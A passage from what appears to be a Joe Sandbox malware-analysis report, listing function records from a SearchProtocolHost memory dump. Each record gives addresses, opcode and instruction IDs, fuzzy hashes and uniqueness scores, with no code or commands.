                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae0942126df66ff3c5474c52696c4dd20c6e7ade0e3f44b952407f983c1f0172
                                                                                      • Instruction ID: 0b2fdd80dbaf29ab200c8751f67eadcbbde1c4b9ca9875d7ba389cf9ac7b3681
                                                                                      • Opcode Fuzzy Hash: ae0942126df66ff3c5474c52696c4dd20c6e7ade0e3f44b952407f983c1f0172
                                                                                      • Instruction Fuzzy Hash: 4C21AC39610B509FC724DF69CC00B46B3F5EF88B04F1484ACA509CB751E331E852CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038105C6 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9066818d86258c4d413c588a08b7b860e995b1436e643441160731872911da1
                                                                                      • Instruction ID: 0e38aecf7d4bcd03353e631e482995e93f5cd4115995477966ace8e9e598f570
                                                                                      • Opcode Fuzzy Hash: c9066818d86258c4d413c588a08b7b860e995b1436e643441160731872911da1
                                                                                      • Instruction Fuzzy Hash: CB2116B4E10308ABCB20DFAAD8819AEFBF8FF98710F10016BE405E7251D7709941CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378B705 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 533efdc656079df3757ecdf43aa62950a26e6bb880bacb792dc767aa17bc2db5
                                                                                      • Instruction ID: 0f891fa80685cff2f05c9276ade77eee18bfeaba5f108eee922899ec4514c2a6
                                                                                      • Opcode Fuzzy Hash: 533efdc656079df3757ecdf43aa62950a26e6bb880bacb792dc767aa17bc2db5
                                                                                      • Instruction Fuzzy Hash: 90216436181B40DFC726EF58C944F5AB7F5FF08708F144AADE10A9A6A1DB34E801CB84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03798690 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bbe76fecfd82bfec01a4138cf1315c43a8fc6a1c8f202c1cb2f4ed7934ce038f
                                                                                      • Instruction ID: 2601639f03e6f504e275c97c99236551bb41dfde7b3a61908a2e5970dcf58d99
                                                                                      • Opcode Fuzzy Hash: bbe76fecfd82bfec01a4138cf1315c43a8fc6a1c8f202c1cb2f4ed7934ce038f
                                                                                      • Instruction Fuzzy Hash: 1A11BF35701625EBDF11CF88DC80A2AB7E9EF4B75071881AEED08DF301D6B2E9018791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03793640 Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73372e22774d3b576cedd217275fb0ba7c95b1eb211c7fcae4737fb7ac4d421a
                                                                                      • Instruction ID: 934105523af6cc817c8a496990d901eb9acc11feac1f9c5910ae986c5eeea6bc
                                                                                      • Opcode Fuzzy Hash: 73372e22774d3b576cedd217275fb0ba7c95b1eb211c7fcae4737fb7ac4d421a
                                                                                      • Instruction Fuzzy Hash: D321F235A002098BFB15EF6DE4487EEB7A4EF88318F198259C8525B3D0CBB89845CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03798009 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da23dde86853f266958152082cf0a879bee148db29bedead3d4cef7cac0b3fa1
                                                                                      • Instruction ID: ac3c9695a85e49e282d411feb365e5d395f8ae60553c206a2fcc89ac0db537fb
                                                                                      • Opcode Fuzzy Hash: da23dde86853f266958152082cf0a879bee148db29bedead3d4cef7cac0b3fa1
                                                                                      • Instruction Fuzzy Hash: 19217C35A00209EFDB14CF98D580B6ABBB5FB89314F25426ED105AB310C771AD02CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C666D Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9a3e154c7bb6cfb079b022062de2f301770996d35ead5c1e54d555445b12bb8
                                                                                      • Instruction ID: f51a5a03091e1a49cae9bf03904966429f33fb6b3cb38fccc7b0a4ae92751263
                                                                                      • Opcode Fuzzy Hash: c9a3e154c7bb6cfb079b022062de2f301770996d35ead5c1e54d555445b12bb8
                                                                                      • Instruction Fuzzy Hash: F0218975610B80EFC720DF69C880F66B3F8FF44750F08882DE69AD7650DA30A844DB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037891F0 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18c81f3e6292db63e348d29c48f9977333e3f215c6734007c59eb7e50c7449ff
                                                                                      • Instruction ID: a9238a7cb631d2d542bf3531b3308f48446947c7aa8870e37a4e7068550d0144
                                                                                      • Opcode Fuzzy Hash: 18c81f3e6292db63e348d29c48f9977333e3f215c6734007c59eb7e50c7449ff
                                                                                      • Instruction Fuzzy Hash: 1D11B27E111A81AAD325FF59EA40A72B7E8EB99B80F1400A5E60097354E774DD02D764
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C65D0 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33066563d0a6cf3f5b8389fc9fa5a2c3fed66d542e595767a3b86c4b8e1578fc
                                                                                      • Instruction ID: 680f688ed7307aae7d47dbbef7c11c85d440507f4a8a1354c0f80053826e65bf
                                                                                      • Opcode Fuzzy Hash: 33066563d0a6cf3f5b8389fc9fa5a2c3fed66d542e595767a3b86c4b8e1578fc
                                                                                      • Instruction Fuzzy Hash: 13118CB6A116849BCB24DF59C5C0B5ABBE9AF98750F0981BDD90AAB311D630DD00CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B270D Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b902c66b122be24b5a871776eda487dbae3870aeafbe38ec8925481b8a39cb6d
                                                                                      • Instruction ID: 102bc7da9722f1bf9c2e9ffacd343e9b46710b8cebc204f71554567dadc0d873
                                                                                      • Opcode Fuzzy Hash: b902c66b122be24b5a871776eda487dbae3870aeafbe38ec8925481b8a39cb6d
                                                                                      • Instruction Fuzzy Hash: 27016639705780AFE325D66E8C88F67B7FDEF80350F0804A9FA098B791DA14CC008622
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384D270 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b8cb3d911fa1dd93be8034d1247e4f4f300c9c3cf9245064d7249680be5cf90
                                                                                      • Instruction ID: 4d6471f0eac7728b611ca799d75cfc47510d4c67a994127a3ed91eb2c86e8957
                                                                                      • Opcode Fuzzy Hash: 5b8cb3d911fa1dd93be8034d1247e4f4f300c9c3cf9245064d7249680be5cf90
                                                                                      • Instruction Fuzzy Hash: CF01AD7670026DAB9B14DBE6C849CAFBBBCEF86614B04009AE909C7610E734FE05C770
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037945B0 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd84c2fd4c247f8f006d12875b967dc138e14d2fc183156c5ccc407704c28394
                                                                                      • Instruction ID: 5ce0383a645f94831f692666230094aaef4f83f3bb57491a5156ff2f32546f0f
                                                                                      • Opcode Fuzzy Hash: cd84c2fd4c247f8f006d12875b967dc138e14d2fc183156c5ccc407704c28394
                                                                                      • Instruction Fuzzy Hash: 1411E5F2600784AFEF21DF6BE844F56B7A8EB84B64F444216F814CB640C370E802CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C6540 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e4b3f6f30dde1cc16b024f38fabe7ee65d1e7854ab897d9e75b8761d5c470d1
                                                                                      • Instruction ID: e433e6c6d5e7470da7ee82710105ff06c9b7f0b1451f2a8be3e6925447bd5723
                                                                                      • Opcode Fuzzy Hash: 6e4b3f6f30dde1cc16b024f38fabe7ee65d1e7854ab897d9e75b8761d5c470d1
                                                                                      • Instruction Fuzzy Hash: 5911E576A00754ABDB21EF58E9C0B5EF7B9EF88700F28005DD901AB245D730EE018BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037872E0 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4782f95312b34049acb0ff400f54785bc945efec13b2dd8b502cb7276755c0e3
                                                                                      • Instruction ID: 3c1f35294c71de40862ee8099353d786d1970942d7d21771d7ad51af3c309fec
                                                                                      • Opcode Fuzzy Hash: 4782f95312b34049acb0ff400f54785bc945efec13b2dd8b502cb7276755c0e3
                                                                                      • Instruction Fuzzy Hash: 5211E071600784AFD715DF58C841B5B77E8FF4A384F258429E986CB610D730E800ABA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C3740 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e888454580e674a054a0faeae06d00685b5a087869cbe59c89eca367fcb5f9ce
                                                                                      • Instruction ID: 3f832e37f13589d28a4853cf6afb8bccc5a20cdd903b45b81567518c8bdc9630
                                                                                      • Opcode Fuzzy Hash: e888454580e674a054a0faeae06d00685b5a087869cbe59c89eca367fcb5f9ce
                                                                                      • Instruction Fuzzy Hash: DB1107B961428ADFE745CF59D480A95BBE5FB49314B08C29EE848CB311D739E880CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BF1F0 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4502d247bd9b7f97a1cb497f02b8c8a2da725a23531aeb43dee16b2c6d2a1bbd
                                                                                      • Instruction ID: f0cd82646b3e88554fb6a8cf63979c678a3fba8905a0695f5ce03d77598ac30d
                                                                                      • Opcode Fuzzy Hash: 4502d247bd9b7f97a1cb497f02b8c8a2da725a23531aeb43dee16b2c6d2a1bbd
                                                                                      • Instruction Fuzzy Hash: 0C118279A007489FD720DF69CC48BAEF7F8BF44A04F1404B5E545AB792DA74D901C750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378A200 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                      • Instruction ID: 449b2a3103cfade16f3e6d884fed2ba099665217c9d6dc6a942a63008d94d93f
                                                                                      • Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                      • Instruction Fuzzy Hash: 6D010032445B11AACB70DF19D840A22BBB8EB8577070486AEF8958B690D331D520CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03796179 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01563c38211d8c389b8ecd551372d3360b7614fc6b95437502f22067af3cb6ef
                                                                                      • Instruction ID: 18b7ce6466e442fe46a471658f8563ae742bb9250951e1853f9f796e4df7768d
                                                                                      • Opcode Fuzzy Hash: 01563c38211d8c389b8ecd551372d3360b7614fc6b95437502f22067af3cb6ef
                                                                                      • Instruction Fuzzy Hash: 5C114C75641728ABEB25EB24CC45FE9B274EF44710F1042D5A619AA1D1DB309E86CF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F68C Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f70aa46c57b1c8904457d5235d048032624cf9021dd18dfee028a1a4a6322259
                                                                                      • Instruction ID: 18fd51a97a18eafd6023f73c630ceef643286650182a74bb799eb0b4c06d5080
                                                                                      • Opcode Fuzzy Hash: f70aa46c57b1c8904457d5235d048032624cf9021dd18dfee028a1a4a6322259
                                                                                      • Instruction Fuzzy Hash: 98116D75A00348EFDB00DFA9D845E9EBBF8EF84704F10406AB900EB390DA74DA01CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03789303 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                      • Instruction ID: 90c14ae90ec127111e678090da294f333c0c59a38f9de9d96e9781cb7fb94fc3
                                                                                      • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                      • Instruction Fuzzy Hash: A211AD32490B01DFD731EF05C880B32B7E5FF49722F198869E6894B8A2C374E881DB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03864600 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                      • Instruction ID: 425d495a752b6014d36b1f2ac4842d687ad2211a91fd896b631be9b872655775
                                                                                      • Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                      • Instruction Fuzzy Hash: 6901FC762007009FE725DA9AD845F5BF3EAFFC5300F184499E652CB650DA70F880CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0381C5FC Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 931cbc2677229696ae6ec1c7b097357b36cb6fedaa79763b2590159bdfce3b3a
                                                                                      • Instruction ID: d29b11e872597a25d69e80219cf555673c112891e5cc46c8908dd2176c28a168
                                                                                      • Opcode Fuzzy Hash: 931cbc2677229696ae6ec1c7b097357b36cb6fedaa79763b2590159bdfce3b3a
                                                                                      • Instruction Fuzzy Hash: 961179B56183049FC700DF69D445A5BBBF8EF88710F00895EF958DB391E630E900CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B32C5 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                      • Instruction ID: f29bba0d9c21f39342d39c920ef02a630fddcf41bf627bfa0be511b0e44d7382
                                                                                      • Opcode Fuzzy Hash: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                      • Instruction Fuzzy Hash: 9F01813A700609ABEB11DAAAED64FDFB7BCAF88650B080429B915DB150DE30DD919770
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384F13E Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a4aed3851d9d32bb957d5ff8239256a1e51a5b6f93e050910f15e3c5df9e3065
                                                                                      • Instruction ID: b9f89da51dafc290f95df92c167d5fb17b5c2c24f70a3e4e063010b76c9f248b
